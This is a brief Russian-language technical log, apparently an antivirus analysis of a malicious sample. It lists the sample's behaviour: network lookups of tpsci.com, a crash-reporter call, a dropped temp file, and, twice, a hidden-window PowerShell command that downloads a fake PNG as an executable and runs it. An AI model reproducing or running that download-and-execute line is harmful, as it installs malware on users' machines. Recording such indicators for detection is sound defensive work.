Техническая информация
- http://www.tpsci.com/hostelfrost.png как %temp%\jipmy.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.TPSCI.COM/hostelfrost.png','%TMP%\jipmy.exe');Start-Process '%TMP%\jipmy.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1908
- %TEMP%\1375726.cvr
- 'tp##i.com':80
- http://www.tp##i.com/hostelfrost.png
- DNS ASK tp##i.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.TPSCI.COM/hostelfrost.png','%TMP%\jipmy.exe');Start-Process '%TMP%\jipmy.exe';' (со скрытым окном)